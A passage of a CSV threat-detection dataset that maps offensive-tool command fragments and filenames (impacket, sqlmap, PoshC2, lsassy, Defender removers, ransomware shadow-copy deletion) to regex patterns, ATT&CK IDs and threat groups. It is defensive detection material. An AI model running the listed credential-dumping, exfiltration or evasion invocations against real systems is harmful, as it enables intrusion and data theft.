computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","770" "* -d *Active Protection DLL for SylantStrike*",".{0,1000}\s\-d\s.{0,1000}Active\sProtection\sDLL\sfor\sSylantStrike.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","771" "* -d:sleepmask*",".{0,1000}\s\-d\:sleepmask.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","772" "* daap-get-library.nse*",".{0,1000}\sdaap\-get\-library\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","773" "* dacledit.py*",".{0,1000}\sdacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","774" "* -daisyserver *",".{0,1000}\s\-daisyserver\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","775" "* danielbohannon/Invoke-CradleCrafter*",".{0,1000}\sdanielbohannon\/Invoke\-CradleCrafter.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","777" "* darkcodersc *",".{0,1000}\sdarkcodersc\s.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","778" "* darkexe.py*",".{0,1000}\sdarkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","779" "* --DataDirectory * --CookieAuthentication * --DisableNetwork * --hush --SocksPort * -f * --ControlPort * --ControlPortWriteToFile *",".{0,1000}\s\-\-DataDirectory\s.{0,1000}\s\-\-CookieAuthentication\s.{0,1000}\s\-\-DisableNetwork\s.{0,1000}\s\-\-hush\s\-\-SocksPort\s.{0,1000}\s\-f\s.{0,1000}\s\-\-ControlPort\s.{0,1000}\s\-\-ControlPortWriteToFile\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","780" "* daytime.nse*",".{0,1000}\sdaytime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","783" "* db2-das-info.nse*",".{0,1000}\sdb2\-das\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","784" "* --dbms=mysql -u *",".{0,1000}\s\-\-dbms\=mysql\s\-u\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","785" "* --dc * -m custom --filter *objectCategory*",".{0,1000}\s\-\-dc\s.{0,1000}\s\-m\scustom\s\-\-filter\s.{0,1000}objectCategory.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","786" "* -dc-host * -spn * -impersonate *",".{0,1000}\s\-dc\-host\s.{0,1000}\s\-spn\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","Black Basta","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","N/A","8","3","275","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z","787" "* -dc-ip * -computer-pass *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-computer\-pass\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","788" "* -dc-ip * -dump *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-dump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","789" "* -dc-ip * -impersonate *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","790" "* --dc-ip * -request * -format hashcat*",".{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-request\s.{0,1000}\s\-format\shashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","0","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","791" "* -dc-ip * -so *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\s\-so\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","792" "* -dc-ip * -target-ip *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-target\-ip\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","793" "* --dc-ip * --vuln --enabled*",".{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-\-vuln\s\-\-enabled.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","794" "* -dc-ip *SAMDump*",".{0,1000}\s\-dc\-ip\s.{0,1000}SAMDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","795" "* dcow.c *",".{0,1000}\sdcow\.c\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation 
tool","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","797" "* dcow.cpp*",".{0,1000}\sdcow\.cpp.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","N/A","4","326","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z","798" "* ddexec.sh *",".{0,1000}\sddexec\.sh\s.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","799" "* -DDONUT_EXE *",".{0,1000}\s\-DDONUT_EXE\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","800" "* ddsc.sh -x*",".{0,1000}\sddsc\.sh\s\-x.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","801" "* ddspoof.py*",".{0,1000}\sddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","802" "* deadPool.ps1*",".{0,1000}\sdeadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","803" "* --deauth * -a TR:GT:AP:BS:SS:ID wlan*",".{0,1000}\s\-\-deauth\s.{0,1000}\s\-a\sTR\:GT\:AP\:BS\:SS\:ID\swlan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive
tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","804" "* --debug --exfil --onedrive*",".{0,1000}\s\-\-debug\s\-\-exfil\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","805" "* decrypt *.aes.zip*",".{0,1000}\sdecrypt\s.{0,1000}\.aes\.zip.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. 
This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","806" "* Decrypt-RDCMan.ps1*",".{0,1000}\sDecrypt\-RDCMan\.ps1.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","807" "* deepce.sh *--install*",".{0,1000}\sdeepce\.sh\s.{0,1000}\-\-install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","808" "* default_logins.txt*",".{0,1000}\sdefault_logins\.txt.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","809" "*--- Defender Remover Script*",".{0,1000}\-\-\-\sDefender\sRemover\sScript.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","810" "* defender-exclusions.ps1*",".{0,1000}\sdefender\-exclusions\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","811" "* Defense_Evasion.sh*",".{0,1000}\sDefense_Evasion\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","812" "* DEL {}SQLDmpr*.mdmp & for /f *",".{0,1000}\sDEL\s\{\}SQLDmpr.{0,1000}\.mdmp\s\&\sfor\s\/f\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","813" "* DelegationBOF.c *",".{0,1000}\sDelegationBOF\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","815" "* delegationx64.o*",".{0,1000}\sdelegationx64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 
- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","816" "* delegationx86.o*",".{0,1000}\sdelegationx86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat 
- BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","817" "* delete shadow copies from *c:/ *",".{0,1000}\sdelete\sshadow\scopies\sfrom\s.{0,1000}c\:\/\s.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#content","N/A","10","4","357","52","2025-04-22T10:00:56Z","2021-07-28T21:00:52Z","818" "* deluge-rpc-brute.nse*",".{0,1000}\sdeluge\-rpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
